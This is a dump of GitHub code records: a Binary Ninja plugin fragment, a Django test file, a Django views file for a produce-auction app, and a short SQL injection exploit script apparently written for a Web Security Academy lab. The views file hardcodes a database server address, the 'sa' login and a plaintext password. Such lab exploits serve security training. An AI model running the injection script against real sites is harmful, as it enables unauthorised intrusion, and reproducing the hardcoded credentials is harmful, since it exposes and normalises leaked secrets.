TODO\n\n Parameters\n ----------\n bv : BinaryView\n bv to modify\n \"\"\"\n\n\ndef register_plugin():\n PluginCommand.register(\"pd-ninja\\Load Symbols.db\",\n \"Load symbols.db from the SDK\",\n apply_symbols_db)\n\n PluginCommand.register(\"pd-ninja\\Import C_API/pd_api.h\",\n \"Load PD types from SDK\",\n import_sdk_header)\n PluginCommand.register(\"pd-ninja\\Add Platform Symbols\",\n \"Add symbols for the STM32F746IE\",\n add_platform_symbols)\n","repo_name":"lockbox/pd-ninja","sub_path":"pd_ninja/pd_plugin.py","file_name":"pd_plugin.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"69940523026","text":"import requests\nimport sys\nimport validators\n\nclass Exploit():\n def __init__(self) -> None:\n self.url = ''\n self.proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n self.payload = {}\n self.check_args()\n self.set_url()\n self.set_payload()\n self.is_vulnerable = False\n self.check_vulnerability()\n self.is_successful = False\n \n def check_args(self) -> None:\n if len(sys.argv) < 3:\n print(f'[-] Usage: {sys.argv[0]} ')\n print(f'[-] Example: {sys.argv[0]} http://example.com \"1=1\"')\n exit()\n\n def set_url(self) -> None:\n url = sys.argv[1].strip() \n is_valid = validators.url(url)\n if not is_valid:\n print(f'[-] The URL \"{url}\" is not valid.')\n print(f'[-] Valid URL example: http://example.com')\n exit()\n\n self.url = url\n \n def set_payload(self) -> None:\n payload = sys.argv[2]\n self.payload['category'] = payload\n\n def check_vulnerability(self) -> None:\n print('[+] Checking for vulnerabiility...')\n req = requests.get(self.url, params={'category': \"'\", 'released': 1})\n if \"Internal Server Error\" in req.text:\n self.is_vulnerable = True\n\n def run(self) -> None:\n if self.is_vulnerable:\n req = requests.get(self.url, params={'category': 'Lifestyle'})\n req_payload = requests.get(self.url, params=self.payload)\n\n if len(req.text) < len(req_payload.text):\n self.is_successful = True\n\ndef main():\n exploit = Exploit()\n exploit.run()\n\n if exploit.is_successful:\n print('[+] SQL injection exploit was successful!')\n else:\n print('[-] The SQL injection exploit was not successful!') \n\nif __name__ == '__main__':\n main()","repo_name":"aeprogress/web-security-academy","sub_path":"sql-injection/lab01/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70552303185","text":"\"\"\" Tests for pipelines. \"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom auth_backends.pipeline import get_user_if_exists\n\nUser = get_user_model()\n\n\nclass GetUserIfExistsPipelineTests(TestCase):\n \"\"\" Tests for the get_user_if_exists pipeline function. \"\"\"\n\n def setUp(self):\n super(GetUserIfExistsPipelineTests, self).setUp()\n self.username = 'edx'\n self.details = {'username': self.username}\n\n def test_no_user_exists(self):\n \"\"\" Verify an empty dict is returned if no user exists. \"\"\"\n actual = get_user_if_exists(None, self.details)\n self.assertDictEqual(actual, {})\n\n def test_existing_user(self):\n \"\"\" Verify a dict with the user and extra details is returned if the user exists. 
\"\"\"\n user = User.objects.create(username=self.username)\n actual = get_user_if_exists(None, self.details)\n self.assertDictEqual(actual, {'is_new': False, 'user': user})\n\n def test_get_user_if_exists(self):\n \"\"\" Verify only the details are returned if a user is passed to the function. \"\"\"\n user = User.objects.create(username=self.username)\n actual = get_user_if_exists(None, self.details, user=user)\n self.assertDictEqual(actual, {'is_new': False})\n","repo_name":"AlaaSwedan/edx","sub_path":"edx/app/ecommerce/venvs/ecommerce/lib/python2.7/site-packages/auth_backends/tests/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74947793104","text":"from ast import Try\nfrom datetime import datetime\nimport operator\nfrom django.db.models.aggregates import Count\nfrom django.db.models.expressions import Exists\nfrom django.shortcuts import render\nfrom django.utils import timezone\nfrom requests import post\nfrom .models import *\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import *\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.contrib.auth import authenticate, get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom transbank.webpay.webpay_plus.transaction import Transaction\nfrom transbank.error.transbank_error import TransbankError\nfrom django.contrib.auth import login\nfrom operator import attrgetter, itemgetter\nfrom django.core.mail import send_mail\nfrom .cart import Cart\nfrom .context_processor import cart_total_amount\nfrom django.views.decorators.csrf import csrf_protect\nfrom dash import Dash, dcc, html, Input, Output\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template.loader import render_to_string\nfrom django_xhtml2pdf.utils import generate_pdf\nfrom django.db.models import Q\nfrom django.views.generic.base import View\nfrom wkhtmltopdf.views import PDFTemplateResponse\nimport math\nfrom django.conf import settings\nfrom django.template.loader import get_template\n\nimport os\n\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport pandas as pd\nimport pyodbc\nimport json\nimport pdfkit\n\n\n\n\ndef ComprobantePDF(request,pk):\n config_path = 'C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe'\n config = pdfkit.configuration(wkhtmltopdf=config_path)\n \n template_path = 'my_template.html'\n template = get_template(template_path)\n \n soli = Post.objects.get(pk=pk)\n Producto = []\n subtotal=0\n for p in soli.producto.all():\n print()\n postP = Post_productos.objects.get(producto=p, post=soli)\n Producto.append([p,postP.cantidad_pujada])\n\n subtotal = subtotal + postP.cantidad_pujada*p.precio\n impuesto= subtotal*0.03\n total = subtotal+impuesto\n subtotal=str('{:,.0f}'.format(subtotal).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n impuesto=str('{:,.0f}'.format(impuesto).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n total=str('{:,.0f}'.format(total).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n \n context = {'debug': settings.DEBUG,'total':total,'impuesto':impuesto,'subtotal':subtotal,'Producto':Producto,'postP':postP,'soli':soli,}\n \n html = template.render(context)\n\n pdf = pdfkit.from_string(html, configuration = config)\n\n\n # 
Generate download\n pdf_path = os.path.join(settings.BASE_DIR, 'static')\n response = HttpResponse(pdf, content_type='application/pdf', )\n\n response['Content-Disposition'] = 'attachment; filename=\"resume.pdf\"'\n # print(response.status_code)\n if response.status_code != 200:\n return HttpResponse('We had some errors
<pre>' + html + '</pre>
')\n return response\n\n\n\n \n\n\n\na=1\na=1\n# Create your views here.\n\ndef index(request):\n cart = Cart(request)\n return render(request, 'index.html', {})\ndef listaContratos(request):\n cart = Cart(request)\n cont = Contrato.objects.all()\n context ={'cont':cont}\n return render(request, 'lista-contratos.html', context)\ndef gestionContratos(request):\n cart = Cart(request)\n return render(request, 'gestion-contratos.html', {})\ndef contratos(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormContratos(request.POST)\n if form.is_valid():\n cont = form.save(commit=False)\n cont.username = form.cleaned_data['usuario']\n existeuser = get_object_or_404(User, username=cont.username)\n \n \n if Contrato.objects.filter(usuario=existeuser, vigencia=True):\n messages.error(request, f'Este usuario ya tiene un contrato vigente.')\n else: \n cont.fecha_inicio = form.cleaned_data['fecha_inicio']\n cont.fecha_termino = form.cleaned_data['fecha_termino']\n if cont.fecha_inicio > cont.fecha_termino:\n messages.error(request, f'La fecha de inicio no puede ser mayor a la de termino del contrato')\n else:\n cont.vigencia = True\n form.save()\n messages.success(request, f'Contrato para usuario {cont.username} creado')\n return redirect('contratos')\n else:\n form = FormContratos()\n context = { 'form': form }\n return render(request, 'contratos.html', context)\n\ndef register(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormRegistroUsuario(request.POST)\n if form.is_valid():\n form = form.save(commit=False)\n if form.rol == \"6\":\n form.is_staff = True\n \n\n form.save()\n messages.success(request, f'Usuario {form.username} creado')\n return redirect('/register')\n else:\n form = FormRegistroUsuario()\n context = { 'form': form }\n return render(request, 'register.html',context)\ndef registerinterno(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormRegistroInterno(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data['username']\n messages.success(request, f'Usuario {username} creado')\n return redirect('login')\n else:\n form = FormRegistroInterno()\n context = { 'form': form }\n return render(request, 'register-interno.html',context) \n\n\ndef seguimientoDetalle(request,pk):\n cart = Cart(request) \n solis = Posthistorico.objects.filter(idpost=pk)\n print(solis)\n context = {'solis':solis}\n return render(request, 'seguimientoDetalle.html',context)\n\n\n\n\ndef seguimiento(request,pk):\n cart = Cart(request) \n if request.user.is_staff:\n solis = Post.objects.filter(pk=pk)\n elif request.user.rol ==\"1\" or request.user.rol ==\"5\" or request.user.rol ==\"3\" or request.user.rol ==\"2\" or request.user.rol ==\"6\":\n solis = Post.objects.filter(pk=pk)\n else:\n solis = Post.objects.filter(usuario=request.user,pk=pk)\n context = {'solis':solis}\n return render(request, 'seguimiento.html',context)\n\ndef seguimientoLista(request):\n user= request.user\n cart = Cart(request)\n solis = []\n prof = []\n if request.user.is_staff:\n solis = Post.objects.all()\n elif request.user.rol ==\"5\":\n solis = Post.objects.all()\n elif request.user.rol ==\"6\":\n solis = Post.objects.all()\n elif request.user.rol ==\"1\":\n post = Post.objects.all()\n print(post)\n for p in post:\n\n for prod in p.producto.filter(autor=user):\n print(prod)\n postprod = Post_productos.objects.get(post=p, producto=prod)\n s = Post.objects.get(pk=postprod.post.pk)\n solis.append(s)\n\n\n\n elif request.user.rol ==\"2\" or 
request.user.rol ==\"3\":\n solis = Post.objects.filter(cliente=user)\n else:\n solis = Post.objects.filter(usuario=request.user)\n context = {'solis':solis}\n return render(request, 'seguimientoLista.html',context)\n\n\n\ndef comprobante(request,pk):\n cart = Cart(request) \n soli = Post.objects.get(pk=pk)\n soliF = Post.objects.get(pk=pk)\n Producto = []\n subtotal=0\n for p in soli.producto.all():\n print()\n postP = Post_productos.objects.get(producto=p, post=soli)\n Producto.append([p,postP.cantidad_pujada])\n\n subtotal = subtotal + postP.cantidad_pujada*p.precio \n \n subtotal = subtotal + soli.transporte.tarifa\n impuesto= subtotal*0.03\n total = subtotal+impuesto\n subtotal=str('{:,.0f}'.format(subtotal).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n impuesto=str('{:,.0f}'.format(impuesto).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n total=str('{:,.0f}'.format(total).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n \n context = {'total':total,'impuesto':impuesto,'subtotal':subtotal,'Producto':Producto,'postP':postP,'soli':soli,}\n \n \n return render(request, 'comprobante.html',context)\n\n\n\n\n\n\ndef seguimientoComprobante(request):\n user= request.user\n cart = Cart(request)\n if request.user.rol ==\"5\":\n solis = Post.objects.filter(EstadoSolicitud= '17')\n else:\n solis = Post.objects.filter(cliente=user,EstadoSolicitud= '17')\n context = {'solis':solis}\n return render(request, 'seguimientoComprobante.html',context)\n\n\napp = Dash(__name__)\n\n@app.callback(\n Output(\"graph\", \"figure\"), \n Input(\"dropdown\", \"value\"))\n\nclass DTEncoder(json.JSONEncoder):\n def default(self, obj):\n # 👇️ if passed in object is datetime object\n # convert it to a string\n if isinstance(obj, datetime):\n return str(obj)\n # 👇️ otherwise use the default behavior\n return json.JSONEncoder.default(self, obj)\n \n \n \n \n \n #langs = Fecha\n #students = usuario\n \n \n #x =langs ,\n #y = students,\n\n\n\ndef ingresarproductos(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormProductos(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.autor = request.user\n form.save()\n messages.success(request, f'Productos agregados a tu lista de productos')\n return redirect('mis-productos')\n \n else:\n form = FormProductos()\n context = { 'form': form }\n return render(request, 'ingresar-productos.html',context)\n\n\n\n\ndef connection(request):\n s = '186.78.254.17\\DESKTOP-A7GEGG2\\SQL2019TAB,14334' #Your server name \n d = 'sqlite8' #name bd \n u = 'sa' #Your login\n p = 'Pvsa**2021' #Your login password\n cstr = 'DRIVER={ODBC Driver 17 for SQL Server};SERVER='+s+';DATABASE='+d+';UID='+u+';PWD='+ p\n conn = pyodbc.connect(cstr)\n return conn \n \n\ndef Consulta(request):\n Estado = 'Completada'\n solis = Post.objects.filter(EstadoSolicitud='17')\n if request.method == 'POST'and 'completada' in request.POST:\n solis = Post.objects.filter(EstadoSolicitud='17')\n Estado = 'Completada'\n elif request.method == 'POST'and 'nocompletada' in request.POST:\n solis = Post.objects.filter(EstadoSolicitud__in=(\"11\",\"13\"))\n Estado = 'No Completada'\n print(solis)\n Producto = []\n subtotal=0\n tarifa =0\n PostCobro =[]\n\n for soli in solis:\n for p in soli.producto.all():\n postP = Post_productos.objects.get(producto=p, post=soli)\n Producto.append([p,postP])\n subtotal = subtotal + postP.cantidad_pujada*p.precio\n PostCobro.append([str(soli.pk), 
postP.producto.pk,postP.producto.autor, postP.cantidad_pujada, p.precio, postP.cantidad_pujada*p.precio ,soli.transporte.tarifa,])\n if soli.transporte:\n tarifa = tarifa + soli.transporte.tarifa\n Tarifaproductos=subtotal+tarifa\n impuesto= Tarifaproductos*0.03\n Cobro = Tarifaproductos+impuesto\n subtotal=str('{:,.0f}'.format(subtotal).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n impuesto=str('{:,.0f}'.format(impuesto).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n Cobro=str('{:,.0f}'.format(Cobro).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n Tarifaproductos=str('{:,.0f}'.format(Tarifaproductos).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n\n\n DataFramePostCobro = pd.DataFrame(PostCobro,columns=['PostPK','PkProducto','Productor','CantidadPujada','PrecioProducto','PrecioProductos','TarifaTrasporte'])\n print(DataFramePostCobro)\n \n\n\n DataframePost= pd.DataFrame( DataFramePostCobro.groupby(['PostPK','TarifaTrasporte'])['PrecioProductos'].sum())\n \n DataframePost= pd.DataFrame( DataframePost.reset_index() )\n \n DataframePost= pd.DataFrame( DataFramePostCobro.groupby(['PostPK','TarifaTrasporte'])['PrecioProductos'].sum())\n \n DataframePost= pd.DataFrame( DataframePost.reset_index() )\n \n Pagatarifatrasporte=DataframePost['TarifaTrasporte'] + DataframePost['PrecioProductos']\n DataframePost.insert(3, \"Pagatarifatrasporte\", Pagatarifatrasporte, True)\n \n CobroFinal =DataframePost['Pagatarifatrasporte'] *1.03\n DataframePost.insert(4, \"CobroFinal\", CobroFinal, True)\n \n Ganacias =DataframePost['Pagatarifatrasporte'] *0.03\n DataframePost.insert(5, \"Ganacias\", Ganacias, True)\n\n print(DataframePost)\n\n '''Graficos'''\n\n\n\n figGeneral = px.bar(DataframePost, x='PostPK',y='CobroFinal', color='PostPK',\n title=\"Solicitud / Cobro Final\",\n \n )\n figGeneral.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n \n \n chartGeneral = figGeneral.to_html()\n\n\n\n\n figP = px.bar(DataframePost, x='PostPK',y='TarifaTrasporte', color='PostPK',\n title=\"Solicitud / Tarifa Trasporte\",\n \n )\n figP.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chartP = figP.to_html()\n\n figProd = px.bar(DataframePost, x='PostPK',y='PrecioProductos', color='PostPK',\n title=\"Solicitud / Precio Productos\",\n \n )\n figProd.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chartfigProd = figProd.to_html()\n \n fig = px.bar(DataframePost, x='PostPK',y='Ganacias', color='PostPK',\n title=\"Solicitud / Ganacias \",\n \n )\n fig.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chart = fig.to_html()\n\n\n\n context = {'chart':chart,'chartfigProd':chartfigProd,'chartP':chartP,'chartGeneral':chartGeneral,'Tarifaproductos':Tarifaproductos,'Estado':Estado,'tarifa':tarifa,'Cobro':Cobro,'impuesto':impuesto,'subtotal':subtotal,'Producto':Producto}\n return render(request, 'Consulta.html',context)\n \n '''\n figUsuario = px.bar(DataframeConsulta, x='Transportista',\n title=\"Post/Transportista\",\n labels={'Usuario': 'Usuario', 'Fecha': 'Fecha'}, color='Transportista',\n )\n figUsuario.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chartUsuario = figUsuario.to_html()\n \n \n \n df = pd.DataFrame(list(Post.objects.all().values()))\n fig = px.bar(DataframeConsulta, x='Usuario', color='Usuario',\n title=\"Post/Usuarios\",\n labels={'Usuario': 
'Usuario', 'Fecha': 'Fecha'},\n )\n fig.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chart = fig.to_html()\n \n \n df = px.data.tips()\n labels = GrupbyProducto.index\n values = GrupbyProducto\n figP = go.Figure(data=[go.Pie(labels=labels, values=values)])\n \n \n figP.update_layout(\n title=\"Plot Title\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"RebeccaPurple\"\n )\n)\n chartP = figP.to_html()\n context = { 'DataframeConsultaSumaProductortarifa':DataframeConsultaSumaProductortarifa,'DataframePost':DataframePost,'form': form ,'chart': chart,'chartP': chartP,'chartUsuario':chartUsuario,'DataframeConsultaSumaProductor':DataframeConsultaSumaProductor,'Df_grouPostIDPrecioFinalTotal':Df_grouPostIDPrecioFinalTotal,'Df_grouPostIDGananciaTotal':Df_grouPostIDGananciaTotal,'chartGeneral':chartGeneral}\n '''\n\n\n\n\n\ndef ingresarproductos(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormProductos(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.autor = request.user\n form.save()\n messages.success(request, f'Productos agregados a tu lista de productos')\n return redirect('mis-productos')\n \n else:\n form = FormProductos()\n context = { 'form': form }\n return render(request, 'ingresar-productos.html',context)\n\nFormEstadoSolicitud\n\ndef misproductos(request):\n cart = Cart(request)\n prod = Producto.objects.filter(autor=request.user)\n context ={'prod':prod}\n return render(request, 'misproductos.html',context)\ndef venta(request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormVenta(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.usuario = request.user\n form.fecha_creacion = timezone.now()\n form.save()\n messages.success(request, f'Venta iniciada!')\n return redirect('/')\n else:\n form = FormVenta()\n context = { 'form': form }\n return render(request, 'iniciar-venta.html',context)\n\ndef pagar(request,total,pk):\n cart = Cart(request)\n total = total \n buy_order = str(pk)\n session_id = str(1)\n return_url = 'http://127.0.0.1:8000/terminar/'+str(pk)+'/'\n\n amount = total\n total= str('{:,.0f}'.format(total).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n try:\n response = Transaction().create(buy_order, session_id, amount, return_url)\n context ={'total':total,\"response\":response}\n print(amount)\n \n return render(request, 'pagar.html', context) \n except TransbankError as e:\n print(e.message)\n print(e.message)\n error =e.message\n context ={'total':total,\"error\":error,}\n return render(request, 'pagar.html', context) \n\ndef notificacion(request):\n cart = Cart(request)\n try:\n notis=Notificacion.objects.filter(usuario=request.user)\n messages.success(request, f'Tienes notificaciones de pago pendientes.')\n context={'notis':notis}\n except:\n messages.error(request, f'No tienes notificaciones actualmente.')\n context={'notis':notis}\n return render(request, 'notificacion.html',context) \n\ndef terminar(request,pk):\n cart = Cart(request)\n token = request.GET.get(\"token_ws\")\n try:\n response = Transaction().commit(token) \n soli = Post.objects.get(pk=pk)\n soli.EstadoSolicitud = \"17\"\n soli.save()\n ccorreo= soli.cliente.email\n '''send_mail(\n 'Su producto a sido completado, revise el comprobante de pago en http://127.0.0.1:8000/seguimientoComprobante/',\n 'maipo_grande@gmail.com',\n [ccorreo],\n fail_silently=False,)\n ''' \n 
#================COMPROBANTES DE PAGO==================\n #================PRODUCTORES==========================\n cantidadprods = len(soli.producto.all())\n cantidaddivida = soli.cantidad_actual//cantidadprods\n \n for p in soli.producto.all():\n\n postP = Post_productos.objects.get(producto=p, post=soli)\n\n comProd = Comprobante(usuario=p.autor,solicitud = soli,monto=p.precio * postP.cantidad_pujada)\n comProd.save()\n print(comProd)\n #================TRANSPORTISTA========================\n comTransp = Comprobante(usuario=soli.transporte.transportista,solicitud=soli,monto=soli.transporte.tarifa)\n comTransp.save()\n print(comTransp)\n\n messages.success(request, f'Pago realizado exitosamente.')\n return render(request, 'terminar.html',{\"token\": token,\"response\": response})\n except TransbankError as e:\n messages.error(request, f'Error en la transaccion de pago.')\n error =e.message\n print(e.message)\n print(token)\n return render(request, 'terminar.html', {\"error\":error}) \n\ndef Solicitud(request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormVenta(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.usuario = request.user\n form.fecha_creacion = timezone.now()\n \n form.save()\n messages.success(request, f'Venta iniciada!')\n return redirect('/Solicitudes')\n else:\n form = FormVenta()\n context = { 'form': form }\n return render(request, 'Solicitud.html',context)\n#SOLICITUD CLIENTES\ndef solicitudClientes(request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormVentaCliente(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.usuario = request.user\n post.fecha_creacion = timezone.now()\n post.save()\n messages.success(request, f'Solicitud enviada')\n return redirect('/Solicitudes')\n else:\n form = FormVentaCliente()\n context = { 'form': form }\n return render(request, 'solicitudClientes.html',context)\n\ndef solicitudes(request):\n cart = Cart(request)\n solis = []\n soli = Post.objects.filter(EstadoSolicitud__in=(\"3\",\"4\",\"6\",\"10\"))\n for s in soli:\n if not s.transportista:\n solis.append(s)\n\n \n context ={'solis':solis}\n return render(request, 'Solicitudes.html', context)\n\ndef solicitudesTransportista(request):\n cart = Cart(request)\n solit = Post.objects.filter(transportista=request.user,EstadoSolicitud__in=(\"10\",\"11\",\"12\",\"13\",\"15\"))\n context ={'solit':solit}\n return render(request, 'SolicitudesTransportista.html', context)\n\ndef solicitudesRevisor(request):\n cart = Cart(request)\n solir = Post.objects.filter(EstadoSolicitud__in=(\"6\",\"8\"))\n context ={'solir':solir}\n return render(request, 'solicitudesRevisor.html', context)\ndef solicitudesProductor(request):\n cart = Cart(request)\n post = Post.objects.filter(EstadoSolicitud__in=(\"1\",\"4\",\"5\"))\n solip = []\n enbodega = False\n for p in post:\n \n for prod in p.producto.filter(autor=request.user):\n post_prod = Post_productos.objects.get(post=p, producto= prod)\n enbodega=post_prod.enbodega\n \n solip = Post.objects.filter(producto=prod)\n\n\n\n context ={'solip':solip,'enbodega':enbodega}\n \n return render(request, 'solicitudesProductor.html', context)\ndef solicitudesClienteExterno(request):\n cart = Cart(request)\n soli = Post.objects.filter(cliente=request.user,EstadoSolicitud__in=(\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\"))\n\n context ={'soli':soli}\n return render(request, 
'solicitudesClienteExterno.html', context)\ndef modificarSolicitud (request, pk):\n cart = Cart(request)\n SolicitudPK = Post.objects.get(pk = pk)\n if request.method == 'POST':\n form = FormSolicitudEstado(request.POST, instance = SolicitudPK)\n if form.is_valid():\n SolicitudPK = form.save(commit=False)\n SolicitudPK = Post.objects.get(pk = pk)\n\n topProductoresCProductos = []\n productoscProductor = Producto.objects.all()\n print(productoscProductor)\n \n for prod in productoscProductor:\n productorunico = User.objects.get(username=prod.autor.username,disponible=True)\n try:\n if Contrato.objects.get(usuario=productorunico,vigencia=True):\n topProductoresCProductos.append(productorunico)\n except Contrato.DoesNotExist:\n messages.error(request, f'No hay productores con contrato disponibles')\n\n \n cantidadnecesaria= SolicitudPK.cantidad_necesaria\n productonecesario = SolicitudPK.productoreq\n calibrenecesario = SolicitudPK.calibre\n variedadnecesaria = SolicitudPK.variedad\n refrigeracionnecesaria = SolicitudPK.refrigeracion\n estadoactual = form.cleaned_data['EstadoSolicitud']\n \n '''Solicitud aprobada'''\n if estadoactual == \"1\":\n topProductos = []\n topProductos1 = []\n topcaso3 = []\n \n for productor in topProductoresCProductos:\n try:\n producto1 = Producto.objects.get(autor=productor,variedad=variedadnecesaria, producto=productonecesario, calibre=calibrenecesario,Saldo=False)\n print(str(producto1.autor)+str(producto1.producto)+str(producto1.variedad))\n if not producto1 in topProductos:\n topProductos.append(producto1)\n except Producto.DoesNotExist:\n print(str(producto1)+\"califica en calibre/producto/saldo\")\n print(topProductos)\n for prodidoneo in topProductos: \n if prodidoneo.cantidad >= cantidadnecesaria:\n topProductos1.append(prodidoneo) \n else: \n topcaso3.append(prodidoneo)\n print(prodidoneo)\n\n try:\n min_precio = min(topProductos1, key=attrgetter('precio'))\n min_precio = min_precio.precio\n except:\n print(\"No hay ningun productor para calcular el precio minimo \")\n\n if not SolicitudPK.producto.exists():\n\n if any(topProductos1): \n print(len(topProductos1))\n if len(topProductos1) == 1:\n for ganador in topProductos1:\n if ganador.precio == min_precio:\n productoganador = ganador \n\n #posiblidad de bloque pl sql, cuando el producto llege a 0,borrar la fila completa del producto\n productoganador.cantidad = productoganador.cantidad - cantidadnecesaria\n productoganador.save()\n #cantidad actual ya n o seria necesaria\n SolicitudPK.cantidad_actual = cantidadnecesaria\n SolicitudPK.EstadoSolicitud = \"4\"\n SolicitudPK.producto.add(productoganador)\n\n\n postprod= Post_productos.objects.get(post=SolicitudPK, producto=productoganador)\n postprod.cantidad_pujada = cantidadnecesaria\n postprod.save()\n\n SolicitudPK.save()\n \n #ENVIAR CORREO AL PRODUCTOR PARA QUE LLEVE SUS PRODUCTOS A BODEGA\n pcorreo= productoganador.autor.email\n '''\n send_mail(\n 'PRODUCTOR!lleva tus productos a bodega central!',\n 'Tus productos ganaron la subasta, el siguiente paso es llevarlos a bodega central',\n 'maipo_grande@gmail.com',\n [pcorreo],\n fail_silently=False,\n )\n '''\n messages.success(request, f'Se ha notificado al productor para que lleve sus productos a bodega') \n #Si hay mas de un productor que califica en calibre,cantidad \n elif len(topProductos1) >= 2:\n print('========================topproductos1')\n print(topProductos1)\n #Se seleccionan los dos primeros (Top 2)\n for ganador in topProductos1[:2]:\n #si tienen el mismo precio(el minimo)\n if 
ganador.precio == min_precio:\n productoganador = ganador \n #Se divide la cantidad en dos\n cantidaddividida= cantidadnecesaria//2\n productoganador.cantidad = productoganador.cantidad - cantidaddividida\n productoganador.save()\n print('========================productoganador.cantidad')\n print(productoganador.cantidad)\n #se actualiza la solicitud a subasta de transporte y la cantidad actual se llena\n #SolicitudPK.cantidad_actual = SolicitudPK.cantidad_actual+cantidaddividida\n SolicitudPK.cantidad_actual = cantidadnecesaria\n SolicitudPK.EstadoSolicitud = \"4\"\n #productores ganadores ya no estan disponibles\n productoganador.autor.disponible=False\n #Debe ser un arreglo de productores(pueden ser mas de un productor ganador)\n\n \n postprod= Post_productos.objects.get(post=SolicitudPK, producto=productoganador)\n postprod.cantidad_pujada = cantidaddividida\n postprod.save()\n SolicitudPK.producto.add(productoganador)\n\n\n #ENVIAR CORREO AL PRODUCTOR PARA QUE LLEVE SUS PRODUCTOS A BODEGA\n '''\n pcorreo= productoganador.autor.email\n send_mail(\n 'PRODUCTOR!lleva tus productos a bodega central!',\n 'Tus productos ganaron la subasta, el siguiente paso es llevarlos a bodega central',\n 'maipo_grande@gmail.com',\n [pcorreo],\n fail_silently=False,\n )\n '''\n else:\n print(str(ganador)+' No tiene el precio minimo para participar en la subasta')\n SolicitudPK.save() \n messages.success(request, f'Se ha notificado a los productores para que lleven sus productos a bodega')\n else:\n topcaso3.sort(key = operator.attrgetter('cantidad'),reverse=True)\n print(topcaso3)\n if any(topcaso3):\n cntsumada = 0\n prodpuja= []\n cntprod=[]\n for prod in topcaso3:\n if cntsumada <= cantidadnecesaria:\n cntsumada=cntsumada+prod.cantidad\n print('cantidad prod: '+str(prod.cantidad))\n print('cantidad sumanda: '+str(cntsumada))\n prodpuja.append(prod)\n cntprod.append(prod.cantidad)\n\n if cntsumada >= cantidadnecesaria:\n diffultimo = cntsumada-cantidadnecesaria\n for p in prodpuja:\n if p==prodpuja[-1]:\n SolicitudPK.producto.add(p, through_defaults={'cantidad_pujada':p.cantidad-diffultimo })\n \n else:\n SolicitudPK.producto.add(p, through_defaults={'cantidad_pujada':p.cantidad })\n \n SolicitudPK.cantidad_actual = cantidadnecesaria\n SolicitudPK.EstadoSolicitud = \"4\"\n SolicitudPK.save()\n\n p.cantidad = p.cantidad-p.cantidad \n p.save()\n\n #ENVIAR CORREO AL PRODUCTOR PARA QUE LLEVE SUS PRODUCTOS A BODEGA\n '''\n pcorreo= p.autor.email\n \n send_mail(\n 'PRODUCTOR!lleva tus productos a bodega central!',\n 'Tus productos ganaron la subasta, el siguiente paso es llevarlos a bodega central',\n 'maipo_grande@gmail.com',\n [pcorreo],\n fail_silently=False,\n )\n '''\n diffultimo = cntsumada-cantidadnecesaria\n \n prodpuja[-1].cantidad = prodpuja[-1].cantidad + diffultimo\n prodpuja[-1].save() \n\n \n messages.success(request, f'Se ha notificado al productor para que lleve sus productos a bodega') \n print(SolicitudPK.producto.all()) \n else:\n SolicitudPK.EstadoSolicitud= '3'\n messages.error(request, f'No hay productos suficientes para satisfacer el pedido.')\n print(SolicitudPK.producto.exists())\n if SolicitudPK.producto.exists():\n #SUBASTA DE TRANSPORTE\n '''==TABLA DE TAMAÑOS TRANSPORTISTA==\n TAMAÑO =(\n (\"1\", \"Liviano \"),\n 